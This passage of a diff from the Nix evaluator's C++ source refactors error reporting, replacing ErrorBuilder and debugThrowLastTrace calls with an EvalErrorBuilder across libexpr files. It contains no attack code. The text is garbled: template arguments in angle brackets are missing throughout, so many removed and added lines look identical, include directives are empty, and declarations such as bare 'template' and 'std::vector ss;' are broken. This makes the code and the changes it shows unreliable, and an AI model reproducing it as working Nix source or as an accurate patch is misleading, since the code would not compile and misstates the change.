EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & for (auto & formal : lambda.formals->formals) formalNames.insert(symbols[formal.name]); auto suggestions = Suggestions::bestMatches(formalNames, symbols[i.name]); - error("function '%1%' called with unexpected argument '%2%'", + error("function '%1%' called with unexpected argument '%2%'", (lambda.name ? 
std::string(symbols[lambda.name]) : "anonymous lambda"), symbols[i.name]) .atPos(lambda.pos) .withTrace(pos, "from call site") .withSuggestions(suggestions) .withFrame(*fun.lambda.env, lambda) - .debugThrow(); + .debugThrow(); } abort(); // can't happen } @@ -1705,11 +1667,12 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & } else - error("attempt to call something which is not a function but %1%: %2%", + error( + "attempt to call something which is not a function but %1%: %2%", showType(vCur), ValuePrinter(*this, vCur, errorPrintOptions)) .atPos(pos) - .debugThrow(); + .debugThrow(); } vRes = vCur; @@ -1779,12 +1742,12 @@ void EvalState::autoCallFunction(Bindings & args, Value & fun, Value & res) if (j != args.end()) { attrs.insert(*j); } else if (!i.def) { - error(R"(cannot evaluate a function that has an argument without a value ('%1%') + error(R"(cannot evaluate a function that has an argument without a value ('%1%') Nix attempted to evaluate a function as a top level expression; in this case it must have its arguments supplied either by default values, or passed explicitly with '--arg' or '--argstr'. 
See https://nixos.org/manual/nix/stable/language/constructs.html#functions.)", symbols[i.name]) - .atPos(i.pos).withFrame(*fun.lambda.env, *fun.lambda.fun).debugThrow(); + .atPos(i.pos).withFrame(*fun.lambda.env, *fun.lambda.fun).debugThrow(); } } } @@ -1815,7 +1778,7 @@ void ExprAssert::eval(EvalState & state, Env & env, Value & v) if (!state.evalBool(env, cond, pos, "in the condition of the assert statement")) { std::ostringstream out; cond->show(state.symbols, out); - state.error("assertion '%1%' failed", out.str()).atPos(pos).withFrame(env, *this).debugThrow(); + state.error("assertion '%1%' failed", out.str()).atPos(pos).withFrame(env, *this).debugThrow(); } body->eval(state, env, v); } @@ -1993,14 +1956,14 @@ void ExprConcatStrings::eval(EvalState & state, Env & env, Value & v) nf = n; nf += vTmp.fpoint; } else - state.error("cannot add %1% to an integer", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); + state.error("cannot add %1% to an integer", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); } else if (firstType == nFloat) { if (vTmp.type() == nInt) { nf += vTmp.integer; } else if (vTmp.type() == nFloat) { nf += vTmp.fpoint; } else - state.error("cannot add %1% to a float", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); + state.error("cannot add %1% to a float", showType(vTmp)).atPos(i_pos).withFrame(env, *this).debugThrow(); } else { if (s.empty()) s.reserve(es->size()); /* skip canonization of first path, which would only be not @@ -2022,7 +1985,7 @@ void ExprConcatStrings::eval(EvalState & state, Env & env, Value & v) v.mkFloat(nf); else if (firstType == nPath) { if (!context.empty()) - state.error("a string that refers to a store path cannot be appended to a path").atPos(pos).withFrame(env, *this).debugThrow(); + state.error("a string that refers to a store path cannot be appended to a path").atPos(pos).withFrame(env, *this).debugThrow(); v.mkPath(state.rootPath(CanonPath(canonPath(str())))); } else 
v.mkStringMove(c_str(), context); @@ -2037,8 +2000,9 @@ void ExprPos::eval(EvalState & state, Env & env, Value & v) void ExprBlackHole::eval(EvalState & state, Env & env, Value & v) { - state.error("infinite recursion encountered") - .debugThrow(); + state.error("infinite recursion encountered") + .atPos(v.determinePos(noPos)) + .debugThrow(); } // always force this to be separate, otherwise forceValue may inline it and take @@ -2052,7 +2016,7 @@ void EvalState::tryFixupBlackHolePos(Value & v, PosIdx pos) try { std::rethrow_exception(e); } catch (InfiniteRecursionError & e) { - e.err.errPos = positions[pos]; + e.atPos(positions[pos]); } catch (...) { } } @@ -2100,15 +2064,18 @@ NixInt EvalState::forceInt(Value & v, const PosIdx pos, std::string_view errorCt try { forceValue(v, pos); if (v.type() != nInt) - error("expected an integer but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected an integer but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.integer; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; } + + return v.integer; } @@ -2119,10 +2086,11 @@ NixFloat EvalState::forceFloat(Value & v, const PosIdx pos, std::string_view err if (v.type() == nInt) return v.integer; else if (v.type() != nFloat) - error("expected a float but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a float but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.fpoint; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2136,15 +2104,18 @@ bool EvalState::forceBool(Value & v, const PosIdx pos, std::string_view errorCtx try { forceValue(v, pos); if (v.type() != nBool) - error("expected a Boolean but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + 
"expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; } + + return v.boolean; } @@ -2159,10 +2130,11 @@ void EvalState::forceFunction(Value & v, const PosIdx pos, std::string_view erro try { forceValue(v, pos); if (v.type() != nFunction && !isFunctor(v)) - error("expected a function but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a function but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2175,10 +2147,11 @@ std::string_view EvalState::forceString(Value & v, const PosIdx pos, std::string try { forceValue(v, pos); if (v.type() != nString) - error("expected a string but found %1%: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) - .debugThrow(); + error( + "expected a string but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ).atPos(pos).debugThrow(); return v.string_view(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2207,7 +2180,7 @@ std::string_view EvalState::forceStringNoCtx(Value & v, const PosIdx pos, std::s { auto s = forceString(v, pos, errorCtx); if (v.context()) { - error("the string '%1%' is not allowed to refer to a store path (such as '%2%')", v.string_view(), v.context()[0]).withTrace(pos, errorCtx).debugThrow(); + error("the string '%1%' is not allowed to refer to a store path (such as '%2%')", v.string_view(), v.context()[0]).withTrace(pos, errorCtx).debugThrow(); } return s; } @@ -2272,11 +2245,13 @@ BackedStringView EvalState::coerceToString( return std::move(*maybeString); auto i = v.attrs->find(sOutPath); if (i == v.attrs->end()) { - error("cannot coerce %1% to a string: %2%", - showType(v), - ValuePrinter(*this, v, 
errorPrintOptions)) + error( + "cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ) .withTrace(pos, errorCtx) - .debugThrow(); + .debugThrow(); } return coerceToString(pos, *i->value, context, errorCtx, coerceMore, copyToStore, canonicalizePath); @@ -2284,7 +2259,7 @@ BackedStringView EvalState::coerceToString( if (v.type() == nExternal) { try { - return v.external->coerceToString(positions[pos], context, coerceMore, copyToStore); + return v.external->coerceToString(*this, pos, context, coerceMore, copyToStore); } catch (Error & e) { e.addTrace(nullptr, errorCtx); throw; @@ -2320,18 +2295,19 @@ BackedStringView EvalState::coerceToString( } } - error("cannot coerce %1% to a string: %2%", - showType(v), - ValuePrinter(*this, v, errorPrintOptions)) + error("cannot coerce %1% to a string: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions) + ) .withTrace(pos, errorCtx) - .debugThrow(); + .debugThrow(); } StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePath & path) { if (nix::isDerivation(path.path.abs())) - error("file names are not allowed to end in '%1%'", drvExtension).debugThrow(); + error("file names are not allowed to end in '%1%'", drvExtension).debugThrow(); auto i = srcToStore.find(path); @@ -2380,7 +2356,7 @@ SourcePath EvalState::coerceToPath(const PosIdx pos, Value & v, NixStringContext relative to the root filesystem. 
*/ auto path = coerceToString(pos, v, context, errorCtx, false, false, true).toOwned(); if (path == "" || path[0] != '/') - error("string '%1%' doesn't represent an absolute path", path).withTrace(pos, errorCtx).debugThrow(); + error("string '%1%' doesn't represent an absolute path", path).withTrace(pos, errorCtx).debugThrow(); return rootPath(CanonPath(path)); } @@ -2390,7 +2366,7 @@ StorePath EvalState::coerceToStorePath(const PosIdx pos, Value & v, NixStringCon auto path = coerceToString(pos, v, context, errorCtx, false, false, true).toOwned(); if (auto storePath = store->maybeParseStorePath(path)) return *storePath; - error("path '%1%' is not in the Nix store", path).withTrace(pos, errorCtx).debugThrow(); + error("path '%1%' is not in the Nix store", path).withTrace(pos, errorCtx).debugThrow(); } @@ -2400,18 +2376,18 @@ std::pair EvalState::coerceToSingleDerivedP auto s = forceString(v, context, pos, errorCtx); auto csize = context.size(); if (csize != 1) - error( + error( "string '%s' has %d entries in its context. It should only have exactly one entry", s, csize) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); auto derivedPath = std::visit(overloaded { [&](NixStringContextElem::Opaque && o) -> SingleDerivedPath { return std::move(o); }, [&](NixStringContextElem::DrvDeep &&) -> SingleDerivedPath { - error( + error( "string '%s' has a context which refers to a complete source and binary closure. This is not supported at this time", - s).withTrace(pos, errorCtx).debugThrow(); + s).withTrace(pos, errorCtx).debugThrow(); }, [&](NixStringContextElem::Built && b) -> SingleDerivedPath { return std::move(b); @@ -2434,16 +2410,16 @@ SingleDerivedPath EvalState::coerceToSingleDerivedPath(const PosIdx pos, Value & error message. 
*/ std::visit(overloaded { [&](const SingleDerivedPath::Opaque & o) { - error( + error( "path string '%s' has context with the different path '%s'", s, sExpected) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); }, [&](const SingleDerivedPath::Built & b) { - error( + error( "string '%s' has context with the output '%s' from derivation '%s', but the string is not the right placeholder for this derivation output. It should be '%s'", s, b.output, b.drvPath->to_string(*store), sExpected) - .withTrace(pos, errorCtx).debugThrow(); + .withTrace(pos, errorCtx).debugThrow(); } }, derivedPath.raw()); } @@ -2528,7 +2504,7 @@ bool EvalState::eqValues(Value & v1, Value & v2, const PosIdx pos, std::string_v case nThunk: // Must not be left by forceValue default: - error("cannot compare %1% with %2%", showType(v1), showType(v2)).withTrace(pos, errorCtx).debugThrow(); + error("cannot compare %1% with %2%", showType(v1), showType(v2)).withTrace(pos, errorCtx).debugThrow(); } } @@ -2767,13 +2743,12 @@ SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_ if (hasPrefix(path, "nix/")) return {corepkgsFS, CanonPath(path.substr(3))}; - debugThrow(ThrownError({ - .msg = hintfmt(evalSettings.pureEval + error( + evalSettings.pureEval ? 
"cannot look up '<%s>' in pure evaluation mode (use '--impure' to override)" : "file '%s' was not found in the Nix search path (add it using $NIX_PATH or -I)", - path), - .errPos = positions[pos] - }), 0, 0); + path + ).atPos(pos).debugThrow(); } @@ -2856,11 +2831,11 @@ Expr * EvalState::parse( } -std::string ExternalValueBase::coerceToString(const Pos & pos, NixStringContext & context, bool copyMore, bool copyToStore) const +std::string ExternalValueBase::coerceToString(EvalState & state, const PosIdx & pos, NixStringContext & context, bool copyMore, bool copyToStore) const { - throw TypeError({ - .msg = hintfmt("cannot coerce %1% to a string: %2%", showType(), *this) - }); + state.error( + "cannot coerce %1% to a string: %2%", showType(), *this + ).atPos(pos).debugThrow(); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 2368187b1..afe89cd30 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -2,6 +2,7 @@ ///@file #include "attr-set.hh" +#include "eval-error.hh" #include "types.hh" #include "value.hh" #include "nixexpr.hh" @@ -151,45 +152,6 @@ struct DebugTrace { bool isError; }; -void debugError(Error * e, Env & env, Expr & expr); - -class ErrorBuilder -{ - private: - EvalState & state; - ErrorInfo info; - - ErrorBuilder(EvalState & s, ErrorInfo && i): state(s), info(i) { } - - public: - template - [[nodiscard, gnu::noinline]] - static ErrorBuilder * create(EvalState & s, const Args & ... args) - { - return new ErrorBuilder(s, ErrorInfo { .msg = hintfmt(args...) 
}); - } - - [[nodiscard, gnu::noinline]] - ErrorBuilder & atPos(PosIdx pos); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withTrace(PosIdx pos, const std::string_view text); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withFrameTrace(PosIdx pos, const std::string_view text); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withSuggestions(Suggestions & s); - - [[nodiscard, gnu::noinline]] - ErrorBuilder & withFrame(const Env & e, const Expr & ex); - - template - [[gnu::noinline, gnu::noreturn]] - void debugThrow(); -}; - - class EvalState : public std::enable_shared_from_this { public: @@ -274,39 +236,10 @@ public: void runDebugRepl(const Error * error, const Env & env, const Expr & expr); - template - [[gnu::noinline, gnu::noreturn]] - void debugThrowLastTrace(E && error) - { - debugThrow(error, nullptr, nullptr); - } - - template - [[gnu::noinline, gnu::noreturn]] - void debugThrow(E && error, const Env * env, const Expr * expr) - { - if (debugRepl && ((env && expr) || !debugTraces.empty())) { - if (!env || !expr) { - const DebugTrace & last = debugTraces.front(); - env = &last.env; - expr = &last.expr; - } - runDebugRepl(&error, *env, *expr); - } - - throw std::move(error); - } - - // This is dangerous, but gets in line with the idea that error creation and - // throwing should not allocate on the stack of hot functions. - // as long as errors are immediately thrown, it works. - ErrorBuilder * errorBuilder; - - template + template [[nodiscard, gnu::noinline]] - ErrorBuilder & error(const Args & ... args) { - errorBuilder = ErrorBuilder::create(*this, args...); - return *errorBuilder; + EvalErrorBuilder & error(const Args & ... 
args) { + return *new EvalErrorBuilder(*this, args...); } private: @@ -845,22 +778,6 @@ SourcePath resolveExprPath(SourcePath path); */ bool isAllowedURI(std::string_view uri, const Strings & allowedPaths); -struct InvalidPathError : EvalError -{ - Path path; - InvalidPathError(const Path & path); -#ifdef EXCEPTION_NEEDS_THROW_SPEC - ~InvalidPathError() throw () { }; -#endif -}; - -template -void ErrorBuilder::debugThrow() -{ - // NOTE: We always use the -LastTrace version as we push the new trace in withFrame() - state.debugThrowLastTrace(ErrorType(info)); -} - } #include "eval-inline.hh" diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index fee58792b..3396b0219 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -147,8 +147,8 @@ static FlakeInput parseFlakeInput(EvalState & state, NixStringContext emptyContext = {}; attrs.emplace(state.symbols[attr.name], printValueAsJSON(state, true, *attr.value, pos, emptyContext).dump()); } else - throw TypeError("flake input attribute '%s' is %s while a string, Boolean, or integer is expected", - state.symbols[attr.name], showType(*attr.value)); + state.error("flake input attribute '%s' is %s while a string, Boolean, or integer is expected", + state.symbols[attr.name], showType(*attr.value)).debugThrow(); } #pragma GCC diagnostic pop } @@ -295,15 +295,15 @@ static Flake getFlake( std::vector ss; for (auto elem : setting.value->listItems()) { if (elem->type() != nString) - throw TypeError("list element in flake configuration setting '%s' is %s while a string is expected", - state.symbols[setting.name], showType(*setting.value)); + state.error("list element in flake configuration setting '%s' is %s while a string is expected", + state.symbols[setting.name], showType(*setting.value)).debugThrow(); ss.emplace_back(state.forceStringNoCtx(*elem, setting.pos, "")); } flake.config.settings.emplace(state.symbols[setting.name], ss); } else - throw TypeError("flake configuration setting '%s' 
is %s", - state.symbols[setting.name], showType(*setting.value)); + state.error("flake configuration setting '%s' is %s", + state.symbols[setting.name], showType(*setting.value)).debugThrow(); } } @@ -865,11 +865,11 @@ static void prim_flakeRefToString( attrs.emplace(state.symbols[attr.name], std::string(attr.value->string_view())); } else { - state.error( + state.error( "flake reference attribute sets may only contain integers, Booleans, " "and strings, but attribute '%s' is %s", state.symbols[attr.name], - showType(*attr.value)).debugThrow(); + showType(*attr.value)).debugThrow(); } } auto flakeRef = FlakeRef::fromAttrs(attrs); diff --git a/src/libexpr/get-drvs.cc b/src/libexpr/get-drvs.cc index 51449ccb3..e9ed1ef08 100644 --- a/src/libexpr/get-drvs.cc +++ b/src/libexpr/get-drvs.cc @@ -49,7 +49,7 @@ std::string PackageInfo::queryName() const { if (name == "" && attrs) { auto i = attrs->find(state->sName); - if (i == attrs->end()) throw TypeError("derivation name missing"); + if (i == attrs->end()) state->error("derivation name missing").debugThrow(); name = state->forceStringNoCtx(*i->value, noPos, "while evaluating the 'name' attribute of a derivation"); } return name; @@ -396,7 +396,8 @@ static void getDerivations(EvalState & state, Value & vIn, } } - else throw TypeError("expression does not evaluate to a derivation (or a set or list of those)"); + else + state.error("expression does not evaluate to a derivation (or a set or list of those)").debugThrow(); } diff --git a/src/libexpr/json-to-value.cc b/src/libexpr/json-to-value.cc index 99a475ff9..2d12c47c5 100644 --- a/src/libexpr/json-to-value.cc +++ b/src/libexpr/json-to-value.cc @@ -1,4 +1,6 @@ #include "json-to-value.hh" +#include "value.hh" +#include "eval.hh" #include #include @@ -159,7 +161,7 @@ public: } bool parse_error(std::size_t, const std::string&, const nlohmann::detail::exception& ex) { - throw JSONParseError(ex.what()); + throw JSONParseError("%s", ex.what()); } }; diff --git 
a/src/libexpr/json-to-value.hh b/src/libexpr/json-to-value.hh index 3b8ec000f..3c8fa5cc0 100644 --- a/src/libexpr/json-to-value.hh +++ b/src/libexpr/json-to-value.hh @@ -1,13 +1,16 @@ #pragma once ///@file -#include "eval.hh" +#include "error.hh" #include namespace nix { -MakeError(JSONParseError, EvalError); +class EvalState; +struct Value; + +MakeError(JSONParseError, Error); void parseJSON(EvalState & state, const std::string_view & s, Value & v); diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index d7a0b5048..af67e847d 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -146,9 +146,9 @@ or { return OR_KW; } try { yylval->n = boost::lexical_cast(yytext); } catch (const boost::bad_lexical_cast &) { - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("invalid integer '%1%'", yytext), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); } return INT_LIT; @@ -156,9 +156,9 @@ or { return OR_KW; } {FLOAT} { errno = 0; yylval->nf = strtod(yytext, 0); if (errno != 0) - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("invalid float '%1%'", yytext), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); return FLOAT_LIT; } @@ -285,9 +285,9 @@ or { return OR_KW; } {ANY} | <> { - throw ParseError({ + throw ParseError(ErrorInfo{ .msg = hintfmt("path has a trailing slash"), - .errPos = state->positions[CUR_POS], + .pos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 6fe4ba81b..6b8f33c42 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -296,10 +296,10 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr & enclosing `with'. If there is no `with', then we can issue an "undefined variable" error now. 
*/ if (withLevel == -1) - throw UndefinedVarError({ - .msg = hintfmt("undefined variable '%1%'", es.symbols[name]), - .errPos = es.positions[pos] - }); + es.error( + "undefined variable '%1%'", + es.symbols[name] + ).atPos(pos).debugThrow(); for (auto * e = env.get(); e && !fromWith; e = e->up) fromWith = e->isWith; this->level = withLevel; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index da0ec6e9d..1f944f10b 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -9,28 +9,13 @@ #include "error.hh" #include "chunked-vector.hh" #include "position.hh" +#include "eval-error.hh" #include "pos-idx.hh" #include "pos-table.hh" namespace nix { -MakeError(EvalError, Error); -MakeError(ParseError, Error); -MakeError(AssertionError, EvalError); -MakeError(ThrownError, AssertionError); -MakeError(Abort, EvalError); -MakeError(TypeError, EvalError); -MakeError(UndefinedVarError, Error); -MakeError(MissingArgumentError, EvalError); - -class InfiniteRecursionError : public EvalError -{ - friend class EvalState; -public: - using EvalError::EvalError; -}; - struct Env; struct Value; class EvalState; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 0a9f076dc..bdd5bbabe 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -66,7 +66,7 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", showAttrPath(symbols, attrPath), positions[prevPos]), - .errPos = positions[pos] + .pos = positions[pos] }); } @@ -74,7 +74,7 @@ inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx pre { throw ParseError({ .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), - .errPos = positions[pos] + .pos = positions[pos] }); } @@ -155,13 +155,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym if (duplicate) throw ParseError({ 
.msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), - .errPos = positions[duplicate->second] + .pos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), - .errPos = positions[pos] + .pos = positions[pos] }); return formals; diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index e95da37f7..95f45c80a 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -66,7 +66,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * { throw ParseError({ .msg = hintfmt(error), - .errPos = state->positions[state->at(*loc)] + .pos = state->positions[state->at(*loc)] }); } @@ -155,7 +155,7 @@ expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), - .errPos = state->positions[CUR_POS] + .pos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); } @@ -245,7 +245,7 @@ expr_simple if (noURLLiterals) throw ParseError({ .msg = hintfmt("URL literals are disabled"), - .errPos = state->positions[CUR_POS] + .pos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); } @@ -341,7 +341,7 @@ attrs } else throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in inherit"), - .errPos = state->positions[state->at(@2)] + .pos = state->positions[state->at(@2)] }); } | { $$ = new AttrPath; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 1197b6e13..1eec6f961 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -39,10 +39,6 @@ namespace nix { * Miscellaneous *************************************************************/ - -InvalidPathError::InvalidPathError(const Path & path) : - EvalError("path '%s' is not valid", path), path(path) {} - StringMap EvalState::realiseContext(const NixStringContext & context) { std::vector drvs; @@ -51,7 +47,7 @@ StringMap EvalState::realiseContext(const 
NixStringContext & context) for (auto & c : context) { auto ensureValid = [&](const StorePath & p) { if (!store->isValidPath(p)) - debugThrowLastTrace(InvalidPathError(store->printStorePath(p))); + error(store->printStorePath(p)).debugThrow(); }; std::visit(overloaded { [&](const NixStringContextElem::Built & b) { @@ -78,9 +74,10 @@ StringMap EvalState::realiseContext(const NixStringContext & context) if (drvs.empty()) return {}; if (!evalSettings.enableImportFromDerivation) - debugThrowLastTrace(Error( + error( "cannot build '%1%' during evaluation because the option 'allow-import-from-derivation' is disabled", - drvs.begin()->to_string(*store))); + drvs.begin()->to_string(*store) + ).debugThrow(); /* Build/substitute the context. */ std::vector buildReqs; @@ -340,16 +337,16 @@ void prim_importNative(EvalState & state, const PosIdx pos, Value * * args, Valu void *handle = dlopen(path.path.c_str(), RTLD_LAZY | RTLD_LOCAL); if (!handle) - state.debugThrowLastTrace(EvalError("could not open '%1%': %2%", path, dlerror())); + state.error("could not open '%1%': %2%", path, dlerror()).debugThrow(); dlerror(); ValueInitializer func = (ValueInitializer) dlsym(handle, sym.c_str()); if(!func) { char *message = dlerror(); if (message) - state.debugThrowLastTrace(EvalError("could not load symbol '%1%' from '%2%': %3%", sym, path, message)); + state.error("could not load symbol '%1%' from '%2%': %3%", sym, path, message).debugThrow(); else - state.debugThrowLastTrace(EvalError("symbol '%1%' from '%2%' resolved to NULL when a function pointer was expected", sym, path)); + state.error("symbol '%1%' from '%2%' resolved to NULL when a function pointer was expected", sym, path).debugThrow(); } (func)(state, v); @@ -365,7 +362,7 @@ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v) auto elems = args[0]->listElems(); auto count = args[0]->listSize(); if (count == 0) - state.error("at least one argument to 'exec' required").atPos(pos).debugThrow(); + 
state.error("at least one argument to 'exec' required").atPos(pos).debugThrow(); NixStringContext context; auto program = state.coerceToString(pos, *elems[0], context, "while evaluating the first element of the argument passed to builtins.exec", @@ -380,7 +377,7 @@ void prim_exec(EvalState & state, const PosIdx pos, Value * * args, Value & v) try { auto _ = state.realiseContext(context); // FIXME: Handle CA derivations } catch (InvalidPathError & e) { - state.error("cannot execute '%1%', since path '%2%' is not valid", program, e.path).atPos(pos).debugThrow(); + state.error("cannot execute '%1%', since path '%2%' is not valid", program, e.path).atPos(pos).debugThrow(); } auto output = runProgram(program, true, commandArgs); @@ -582,7 +579,7 @@ struct CompareValues if (v1->type() == nInt && v2->type() == nFloat) return v1->integer < v2->fpoint; if (v1->type() != v2->type()) - state.error("cannot compare %s with %s", showType(*v1), showType(*v2)).debugThrow(); + state.error("cannot compare %s with %s", showType(*v1), showType(*v2)).debugThrow(); // Allow selecting a subset of enum values #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wswitch-enum" @@ -610,7 +607,7 @@ struct CompareValues } } default: - state.error("cannot compare %s with %s; values of that type are incomparable", showType(*v1), showType(*v2)).debugThrow(); + state.error("cannot compare %s with %s; values of that type are incomparable", showType(*v1), showType(*v2)).debugThrow(); #pragma GCC diagnostic pop } } catch (Error & e) { @@ -637,7 +634,7 @@ static Bindings::iterator getAttr( { Bindings::iterator value = attrSet->find(attrSym); if (value == attrSet->end()) { - state.error("attribute '%s' missing", state.symbols[attrSym]).withTrace(noPos, errorCtx).debugThrow(); + state.error("attribute '%s' missing", state.symbols[attrSym]).withTrace(noPos, errorCtx).debugThrow(); } return value; } @@ -758,7 +755,7 @@ static RegisterPrimOp primop_break({ auto error = Error(ErrorInfo { .level = 
lvlInfo, .msg = hintfmt("breakpoint reached"), - .errPos = state.positions[pos], + .pos = state.positions[pos], }); auto & dt = state.debugTraces.front(); @@ -769,7 +766,7 @@ static RegisterPrimOp primop_break({ throw Error(ErrorInfo{ .level = lvlInfo, .msg = hintfmt("quit the debugger"), - .errPos = nullptr, + .pos = nullptr, }); } } @@ -790,7 +787,7 @@ static RegisterPrimOp primop_abort({ NixStringContext context; auto s = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtins.abort").toOwned(); - state.debugThrowLastTrace(Abort("evaluation aborted with the following error message: '%1%'", s)); + state.error("evaluation aborted with the following error message: '%1%'", s).debugThrow(); } }); @@ -809,7 +806,7 @@ static RegisterPrimOp primop_throw({ NixStringContext context; auto s = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtin.throw").toOwned(); - state.debugThrowLastTrace(ThrownError(s)); + state.error(s).debugThrow(); } }); @@ -1128,37 +1125,33 @@ drvName, Bindings * attrs, Value & v) experimentalFeatureSettings.require(Xp::DynamicDerivations); ingestionMethod = TextIngestionMethod {}; } else - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid value '%s' for 'outputHashMode' attribute", s), - .errPos = state.positions[noPos] - })); + state.error( + "invalid value '%s' for 'outputHashMode' attribute", s + ).atPos(v).debugThrow(); }; auto handleOutputs = [&](const Strings & ss) { outputs.clear(); for (auto & j : ss) { if (outputs.find(j) != outputs.end()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("duplicate derivation output '%1%'", j), - .errPos = state.positions[noPos] - })); + state.error("duplicate derivation output '%1%'", j) + .atPos(v) + .debugThrow(); /* !!! Check whether j is a valid attribute name. */ /* Derivations cannot be named ‘drv’, because then we'd have an attribute ‘drvPath’ in the resulting set. 
*/ if (j == "drv") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("invalid derivation output name 'drv'" ), - .errPos = state.positions[noPos] - })); + state.error("invalid derivation output name 'drv'") + .atPos(v) + .debugThrow(); outputs.insert(j); } if (outputs.empty()) - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("derivation cannot have an empty set of outputs"), - .errPos = state.positions[noPos] - })); + state.error("derivation cannot have an empty set of outputs") + .atPos(v) + .debugThrow(); }; try { @@ -1281,16 +1274,14 @@ drvName, Bindings * attrs, Value & v) /* Do we have all required attributes? */ if (drv.builder == "") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("required attribute 'builder' missing"), - .errPos = state.positions[noPos] - })); + state.error("required attribute 'builder' missing") + .atPos(v) + .debugThrow(); if (drv.platform == "") - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("required attribute 'system' missing"), - .errPos = state.positions[noPos] - })); + state.error("required attribute 'system' missing") + .atPos(v) + .debugThrow(); /* Check whether the derivation name is valid. */ if (isDerivation(drvName) && @@ -1298,10 +1289,10 @@ drvName, Bindings * attrs, Value & v) outputs.size() == 1 && *(outputs.begin()) == "out")) { - state.debugThrowLastTrace(EvalError({ - .msg = hintfmt("derivation names are allowed to end in '%s' only if they produce a single derivation file", drvExtension), - .errPos = state.positions[noPos] - })); + state.error( + "derivation names are allowed to end in '%s' only if they produce a single derivation file", + drvExtension + ).atPos(v).debugThrow(); } if (outputHash) { @@ -1310,10 +1301,9 @@ drvName, Bindings * attrs, Value & 